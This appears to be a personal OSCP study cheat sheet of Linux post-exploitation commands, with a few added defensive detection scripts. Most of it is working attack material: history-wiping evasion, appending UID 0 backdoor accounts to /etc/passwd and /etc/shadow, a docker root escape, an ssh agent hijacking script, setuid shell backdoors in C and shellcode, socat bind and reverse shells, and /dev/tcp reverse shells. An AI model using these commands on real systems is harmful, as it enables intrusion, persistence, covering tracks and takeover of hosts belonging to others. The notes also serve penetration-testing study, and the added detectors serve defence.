
Last changed: 08.07.2020

Linux post exploitation


This command list was also part of my notes for the Offensive Security Certified Professional exam. It summarizes some useful methods to gather information on a Linux host after having gained command execution.

upgrade shell


To upgrade your shell to a fully functional interactive shell, use the following commands:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
reset

bash history


To prevent bash from writing the commands of the current session to its history file at logout, you can temporarily unset HISTFILE or reload the old history before logging out.

unset HISTFILE
history -r

You can also turn off history and delete single entries.

set +o history
history -d -1

If HISTCONTROL is set to ignorespace or ignoreboth, command lines beginning with a space are not written to the history.

login information


A first step should be to determine which privileges you have and how often the system is accessed by other users.

show user privileges

id
whoami
capsh --print

login history

w
who
last
lastlog

failed logins

utmpdump /var/log/btmp
grep -i fail /var/log/auth.log
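
As an added example (not part of the original notes), a small script that turns sshd lines like those the grep above finds in /var/log/auth.log into a per-user, per-source count of failed logins. The log lines are a constructed sample and the function names are mine.

```bash
#!/bin/sh
# Constructed sshd lines in the format of /var/log/auth.log (not captured from a real host).
SAMPLE_AUTH_LOG='Jul  8 10:01:12 host sshd[2101]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jul  8 10:01:15 host sshd[2101]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jul  8 10:01:19 host sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Jul  8 10:02:40 host sshd[2110]: Accepted publickey for alice from 198.51.100.5 port 40102 ssh2
Jul  8 10:03:02 host sshd[2115]: Failed password for alice from 198.51.100.9 port 40200 ssh2
Jul  8 10:05:31 host sshd[2120]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.0.113.7  user=root'

# Print "count user source" for every failed sshd password attempt, most frequent first.
# Attempts against non-existent accounts ("invalid user") are counted under that name,
# so the list also shows which user names are being guessed.
failed_logins() {
    printf '%s\n' "$1" | awk '
        /sshd\[[0-9]+\]: Failed password for / {
            user = $0; sub(/.*Failed password for (invalid user )?/, "", user); sub(/ from .*/, "", user)
            src  = $0; sub(/.* from /, "", src); sub(/ port .*/, "", src)
            count[user " " src]++
        }
        END { for (k in count) print count[k], k }' | sort -rn
}

# Total failed attempts from one source address, e.g. failed_from "$log" 203.0.113.7
failed_from() {
    failed_logins "$1" | awk -v ip="$2" '$3 == ip { n += $1 } END { print n + 0 }'
}

failed_logins "$SAMPLE_AUTH_LOG"
```

On a real host replace the sample with "$(grep sshd /var/log/auth.log)"; the pam_unix lines are left out on purpose because they duplicate the sshd messages.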

system information


distro and kernel info

cat /etc/issue
uname -a

hostname

hostname
hostname -f

running tasks

ps aux
pstree
kill -9 1234
killall ...

installed packages

dpkg -l
yum list installed
pacman -Q

environment variables

env

user management


usernames and password hashes

ls -l /home
cat /etc/passwd
echo "admin:`mkpasswd password`:0:0:admin,,,:/tmp:/bin/bash" >> /etc/passwd
cat /etc/shadow
echo "admin:x:0:0:admin,,,:/root:/bin/bash" >> /etc/passwd
echo "admin:`openssl passwd -6 password`:12345:0:99999:7:::" >> /etc/shadow
unshadow passwd shadow > passwd.unshadow
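
An added check, not from the original notes, that looks for the traces the commands above leave in /etc/passwd: an extra UID 0 account, a password hash stored inline instead of in /etc/shadow, and a login account whose home is under /tmp. The passwd content is a constructed sample and the hash value is a placeholder.

```bash
#!/bin/sh
# Constructed /etc/passwd content (not from a real host): a normal set of accounts plus
# the two kinds of entries appended above, one with an inline hash and one with UID 0
# behind an "x". The hash is a placeholder, not a real crypt string.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
admin:$6$placeholder$notarealhash:0:0:admin,,,:/tmp:/bin/bash
backup:x:0:0:backup,,,:/var/backups:/bin/sh'

# Print one "<kind> <name>" line per finding:
#   uid0        - an account other than root with UID 0
#   inline-hash - a password hash stored in /etc/passwd instead of /etc/shadow
#   odd-home    - an account with a login shell whose home lives under /tmp
suspicious_accounts() {
    printf '%s\n' "$1" | awk -F: '
        NF < 7 { next }
        $3 == 0 && $1 != "root" { print "uid0 " $1 }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" && $2 != "" { print "inline-hash " $1 }
        ($6 == "/tmp" || index($6, "/tmp/") == 1) && $7 !~ /nologin|false$/ { print "odd-home " $1 }
    '
}

# Number of findings of one kind, e.g. count_findings "$SAMPLE_PASSWD" uid0
count_findings() {
    suspicious_accounts "$1" | awk -v kind="$2" '$1 == kind { n++ } END { print n + 0 }'
}

suspicious_accounts "$SAMPLE_PASSWD"
```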

sudo permissions

sudo -l
cat /etc/sudoers

A nice collection of ways to start a shell from another program can be found on https://gtfobins.github.io/.

gain root with docker

docker container run -v /etc:/tmp/etc -i centos /bin/bash

network configuration


network interfaces

ip l
ip a

routes

ip r
ip r l t 0
ip r a 10.1.1.0/24 via 192.168.11.3
netstat -r

dns server

cat /etc/resolv.conf

open ports

netstat -tunap
ss -tunap
netstat -pelt

firewall rules

iptables -L
iptables -A INPUT -p tcp --dport 4444 -j ACCEPT

enable ssh

/etc/init.d/ssh start
service ssh start
systemctl start ssh

network


network scan

for ip in {1..254}; do arping -w1 -c1 192.168.199.$ip ; done

arp cache

arp -n
ip n

active connections

ss -tun
lsof -nPi

download file

curl -i http://1.2.3.4/
wget http://1.2.3.4/tool.zip

traffic dump

tcpdump -i eth0 -w dns.pcap udp port 53
tshark -r dns.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name

file system


df -h
lsblk -f
mount
mount -o remount,rw,exec /

searching files


grep

grep -rHi "string" /path

find

find /path -type f -exec grep -Hi "string" {} \;
find / -iname '*.bak' -perm -004 -ls 2>/dev/null
find / -type f -amin -60 2>/dev/null
find / -type f -writable 2>/dev/null
find / -type d -writable 2>/dev/null
find / -type f -perm /6000 -ls 2>/dev/null

scheduled tasks


list scheduled scripts

ls /etc/cron.*
cat /etc/crontab
crontab -l

add new task

echo "* * * * * root date >> /tmp/log" >> /etc/crontab
crontab -e
crontab -r

ssh agent hijacking


If someone uses ssh agent forwarding and you can access the forwarded agent socket, you can use their agent to authenticate.

hijack.sh

#!/bin/bash
# wait until a forwarded agent socket directory appears in /tmp
# (an unquoted glob inside [ ] fails as soon as more than one matches)
while ! ls -d /tmp/ssh* >/dev/null 2>&1; do
        sleep 0.1
done
# use the first agent socket found
file=$(ls /tmp/ssh*/* 2>/dev/null | head -n1)
SSH_AUTH_SOCK="${file}" ssh root@localhost

network file system


create share

systemctl start nfs-server
echo "/srv/nfs_share *(rw,sync,nohide)" >> /etc/exports
exportfs -var

find and mount

nmap -Pn <network> -p 111,2049
showmount -e <target>
mount -t nfs <target>:/nfs_share /mnt/nfs

squashfs


modify squashfs image

unsquashfs image.file
vim squashfs-root/<file_to_change>
mksquashfs squashfs-root/ new_image.file -noappend -always-use-fragments

selfmade backdoors


setuid.c

#include <unistd.h>
#include <stdlib.h>

/* switch to uid 0 (works when the binary is setuid root) and start a shell */
int main(void){
    setuid(0);
    system("/bin/sh");
    return 0;
}

setuid.asm

BITS 32
global _start
section .text
_start:

xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h

xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0bh]
mov ebx,esp
int 80h

compile asm

nasm -f elf setuid.asm
ld -o setuid -melf_i386 setuid.o

compile to shellcode

nasm -f bin setuid.asm -o shellcode
xxd -p shellcode

socat


backdoor

socat tcp-listen:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw
socat tcp-connect:<my_ip>:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw

file transfer

socat -u tcp-listen:4444,reuseaddr open:<filename>,creat
socat -u tcp-connect:<my_ip>:4444 file:<filename>

bash backconnect


Bash offers a pseudo device (/dev/tcp) for creating network connections. The second command is an alternative that does the same as the first.

/bin/bash -i < /dev/tcp/localhost/8888 1>&0 2>&0
/bin/bash -i &> /dev/tcp/localhost/8888 0>&1
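
An added detection example, not part of the original notes, for shells started this way: their stdin, stdout and stderr all point to the same socket instead of a pty. The fd records are a constructed sample; proc_fd_records is a helper I added to build the same records from a live /proc.

```bash
#!/bin/sh
# Constructed "pid comm fd target" records in the shape readlink /proc/PID/fd/N returns
# (not captured from a real host): one bash on a terminal, one bash with fds 0-2 on a socket.
SAMPLE_FDS='4120 bash 0 /dev/pts/1
4120 bash 1 /dev/pts/1
4120 bash 2 /dev/pts/1
5177 bash 0 socket:[88123]
5177 bash 1 socket:[88123]
5177 bash 2 socket:[88123]
5202 sshd 3 socket:[88001]'

# Collect the same records from the live /proc of this host (Linux only; needs root
# to see the file descriptors of other users' processes).
proc_fd_records() {
    for p in /proc/[0-9]*; do
        comm=$(cat "$p/comm" 2>/dev/null) || continue
        for fd in 0 1 2; do
            tgt=$(readlink "$p/fd/$fd" 2>/dev/null) || continue
            printf '%s %s %s %s\n' "${p#/proc/}" "$comm" "$fd" "$tgt"
        done
    done
}

# Print the pid of every shell whose stdin, stdout and stderr are all sockets, which is
# exactly what the /dev/tcp redirections above produce; a normal interactive shell sits on a pty.
socket_shells() {
    printf '%s\n' "$1" | awk '
        $2 ~ /^(ba|da|z|k)?sh$/ && $3 ~ /^[012]$/ && $4 ~ /^socket:/ { seen[$1]++ }
        END { for (pid in seen) if (seen[pid] == 3) print pid }'
}

socket_shells "$SAMPLE_FDS"
```

On a live host run socket_shells "$(proc_fd_records)" and compare the socket inode against ss -tunp to see the remote end.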

xserver backconnect


To connect graphical applications to your local X server, you can use Xnest

Xnest :1

or configure X11 to allow inbound TCP connections and reboot.

/etc/gdm/custom.conf

[security]
DisallowTCP=false

In both cases you have to disable access control with

xhost +

On the victim you can start

xterm -display <target-ip>:1